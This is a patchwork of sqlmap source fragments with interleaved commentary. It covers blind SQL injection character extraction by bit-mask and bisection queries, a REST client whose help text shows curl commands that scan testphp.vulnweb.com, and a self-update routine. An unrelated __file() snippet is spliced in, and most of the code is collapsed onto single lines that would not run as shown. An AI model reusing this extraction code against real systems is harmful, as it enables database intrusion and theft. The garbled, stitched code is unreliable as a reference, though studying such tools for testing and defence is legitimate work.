> VALID_TIME_CHARS_RUN_THRESHOLD: dbgMsg = "turning back on time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES return decodeIntToUnicode(retVal) else: return None else: candidates = list(originalTbl) bit = 0 while len(candidates) > 1: bits = {} for candidate in candidates: bit = 0 while candidate: bits.setdefault(bit, 0) bits[bit] += 1 if candidate & 1 else -1 candidate >>= 1 bit += 1 choice = sorted(bits.items(), key=lambda _: abs(_[1]))[0][0] mask = 1 << choice forgedPayload = safeStringFormat( payload.replace( INFERENCE_GREATER_CHAR, "&%d%s" % (mask, INFERENCE_GREATER_CHAR)), (expressionUnescaped, idx, 0)) result = Request.queryPage( forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: candidates = [_ for _ in candidates if _ & mask > 0] else: candidates = [_ for _ in candidates if _ & mask == 0] bit += 1 if candidates: forgedPayload = safeStringFormat( payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, candidates[0])) result = Request.queryPage( forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: return decodeIntToUnicode(candidates[0])
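getChar() narrows down a character's code point by repeatedly asking the injection oracle whether the value is greater than the midpoint of the remaining charset, halving the candidate range each time. A self-contained sketch of that bisection (the oracle here is faked locally; in sqlmap it is a Request.queryPage() call):

def infer_char(oracle_greater_than, charset=None):
    # Assumes a sorted, contiguous charset of code points (printable ASCII here).
    charset = charset or list(range(32, 127))
    low, high = 0, len(charset) - 1
    while low < high:
        mid = (low + high) // 2
        if oracle_greater_than(charset[mid]):   # asks: "is the target > charset[mid]?"
            low = mid + 1
        else:
            high = mid
    return chr(charset[low])

# Fake oracle for the letter 'M' (code point 77): answers the greater-than question locally.
print(infer_char(lambda value: ord('M') > value))   # -> M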
def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=None, password=None): """ REST-JSON API client """ DataStore.username = username DataStore.password = password dbgMsg = "Example client access from command line:" dbgMsg += "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\\{16\\}') && echo $taskid" % (host, port) dbgMsg += "\n\t$ curl -H \"Content-Type: application/json\" -X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' http://%s:%d/scan/$taskid/start" % (host, port) dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/data" % (host, port) dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/log" % (host, port) logger.debug(dbgMsg) addr = "http://%s:%d" % (host, port) logger.info("Starting REST-JSON API client to '%s'..." % addr) try: _client(addr) except Exception as ex: if not isinstance(ex, _urllib.error.HTTPError) or ex.code == _http_client.UNAUTHORIZED: errMsg = "There has been a problem while connecting to the " errMsg += "REST-JSON API server at '%s' " % addr errMsg += "(%s)" % ex logger.critical(errMsg) return commands = ("help", "new", "use", "data", "log", "status", "option", "stop", "kill", "list", "flush", "exit", "bye", "quit") autoCompletion(AUTOCOMPLETE_TYPE.API, commands=commands) taskid = None logger.info("Type 'help' or '?' for list of available commands") while True: try: command = _input("api%s> " % (" (%s)" % taskid if taskid else "")).strip() command = re.sub(r"\A(\w+)", lambda match: match.group(1).lower(), command) except (EOFError, KeyboardInterrupt): print() break if command in ("data", "log", "status", "stop", "kill"): if not taskid: logger.error("No task ID in use") continue raw = _client("%s/scan/%s/%s" % (addr, taskid, command)) res = dejsonize(raw) if not res["success"]: logger.error("Failed to execute command %s" % command) dataToStdout("%s\n" % raw) elif command.startswith("option"): if not taskid: logger.error("No task ID in use") continue try: command, option = command.split(" ", 1) except ValueError: raw = _client("%s/option/%s/list" % (addr, taskid)) else: options = re.split(r"\s*,\s*", option.strip()) raw = _client("%s/option/%s/get" % (addr, taskid), options) res = dejsonize(raw) if not res["success"]: logger.error("Failed to execute command %s" % command) dataToStdout("%s\n" % raw) elif command.startswith("new"): if ' ' not in command: logger.error("Program arguments are missing") continue try: argv = ["sqlmap.py"] + shlex.split(command)[1:] except Exception as ex: logger.error("Error occurred while parsing arguments ('%s')" % ex) taskid = None continue try: cmdLineOptions = cmdLineParser(argv).__dict__ except: taskid = None continue for key in list(cmdLineOptions): if cmdLineOptions[key] is None: del cmdLineOptions[key] raw = _client("%s/task/new" % addr) res = dejsonize(raw) if not res["success"]: logger.error("Failed to create new task") continue taskid = res["taskid"] logger.info("New task ID is '%s'" % taskid) raw = _client("%s/scan/%s/start" % (addr, taskid), cmdLineOptions) res = dejsonize(raw) if not res["success"]: logger.error("Failed to start scan") continue logger.info("Scanning started") elif command.startswith("use"): taskid = (command.split()[1] if ' ' in command else "").strip("'\"") if not taskid: logger.error("Task ID is missing") taskid = None continue elif not re.search(r"\A[0-9a-fA-F]{16}\Z", taskid): logger.error("Invalid task ID '%s'" % taskid) taskid = None continue logger.info("Switching to task ID '%s' " % taskid) elif command in ("list", "flush"): raw = 
_client("%s/admin/%s" % (addr, command)) res = dejsonize(raw) if not res["success"]: logger.error("Failed to execute command %s" % command) elif command == "flush": taskid = None dataToStdout("%s\n" % raw) elif command in ("exit", "bye", "quit", 'q'): return elif command in ("help", "?"): msg = "help Show this help message\n" msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n" msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n" msg += "data Retrieve and show data for current task\n" msg += "log Retrieve and show log for current task\n" msg += "status Retrieve and show status for current task\n" msg += "option OPTION Retrieve and show option for current task\n" msg += "options Retrieve and show all options for current task\n" msg += "stop Stop current task\n" msg += "kill Kill current task\n" msg += "list Display all tasks\n" msg += "flush Flush tasks (delete all tasks)\n" msg += "exit Exit this client\n" dataToStdout(msg) elif command: logger.error("Unknown command '%s'" % command)
def __file():
    if not os.path.isfile(input_file):
        logger.error('TargetFile not found: %s' % input_file)
        sys.exit(1)

    conf.TARGET_MODE = TARGET_MODE_STATUS.FILE
    conf.INPUT_FILE_PATH = input_file
def update(): if not conf.updateAll: return success = False if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")): warnMsg = "not a git repository. It is recommended to clone the 'sqlmapproject/sqlmap' repository " warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY logger.warn(warnMsg) if VERSION == getLatestRevision(): logger.info("already at the latest revision '%s'" % getRevisionNumber()) return message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]" if readInput(message, default='N', boolean=True): directory = os.path.abspath(paths.SQLMAP_ROOT_PATH) try: open(os.path.join(directory, "sqlmap.py"), "w+b") except Exception as ex: errMsg = "unable to update content of directory '%s' ('%s')" % ( directory, getSafeExString(ex)) logger.error(errMsg) else: attrs = os.stat(os.path.join(directory, "sqlmap.py")).st_mode for wildcard in ('*', ".*"): for _ in glob.glob(os.path.join(directory, wildcard)): try: if os.path.isdir(_): shutil.rmtree(_) else: os.remove(_) except: pass if glob.glob(os.path.join(directory, '*')): errMsg = "unable to clear the content of directory '%s'" % directory logger.error(errMsg) else: try: archive = _urllib.request.urlretrieve(ZIPBALL_PAGE)[0] with zipfile.ZipFile(archive) as f: for info in f.infolist(): info.filename = re.sub(r"\Asqlmap[^/]+", "", info.filename) if info.filename: f.extract(info, directory) filepath = os.path.join(paths.SQLMAP_ROOT_PATH, "lib", "core", "settings.py") if os.path.isfile(filepath): with openFile(filepath, "rb") as f: version = re.search( r"(?m)^VERSION\s*=\s*['\"]([^'\"]+)", f.read()).group(1) logger.info( "updated to the latest version '%s#dev'" % version) success = True except Exception as ex: logger.error("update could not be completed ('%s')" % getSafeExString(ex)) else: if not success: logger.error("update could not be completed") else: try: os.chmod(os.path.join(directory, "sqlmap.py"), attrs) except OSError: logger.warning( "could not set the file attributes of '%s'" % os.path.join(directory, "sqlmap.py")) else: infoMsg = "updating sqlmap to the latest development revision from the " infoMsg += "GitHub repository" logger.info(infoMsg) debugMsg = "sqlmap will try to update itself using 'git' command" logger.debug(debugMsg) dataToStdout("\r[%s] [INFO] update in progress" % time.strftime("%X")) try: process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=paths.SQLMAP_ROOT_PATH) pollProcess(process, True) output, _ = process.communicate() success = not process.returncode except Exception as ex: success = False output = getSafeExString(ex) finally: output = getText(output) if success: logger.info("%s the latest revision '%s'" % ("already at" if "Already" in output else "updated to", getRevisionNumber())) else: if "Not a git repository" in output: errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository " errMsg += "from GitHub (e.g. 
'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY logger.error(errMsg) else: logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", output).strip()) if not success: if IS_WIN: infoMsg = "for Windows platform it's recommended " infoMsg += "to use a GitHub for Windows client for updating " infoMsg += "purposes (http://windows.github.com/) or just " infoMsg += "download the latest snapshot from " infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads" else: infoMsg = "for Linux platform it's recommended " infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')" logger.info(infoMsg)
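The git branch of update() shells out to "git checkout . && git pull <repo> HEAD" and treats a zero return code as success. A compact sketch of that step, detached from sqlmap's paths/conf objects (git_pull is a hypothetical helper; the repository URL is the public sqlmap one):

import subprocess

def git_pull(repo_dir, remote="https://github.com/sqlmapproject/sqlmap.git"):
    # Mirrors the command used above; returns (success, raw git output).
    process = subprocess.Popen("git checkout . && git pull %s HEAD" % remote,
                               shell=True, stdout=subprocess.PIPE,
                               stderr=subprocess.STDOUT, cwd=repo_dir)
    output, _ = process.communicate()
    return process.returncode == 0, output

# ok, output = git_pull("/path/to/sqlmap")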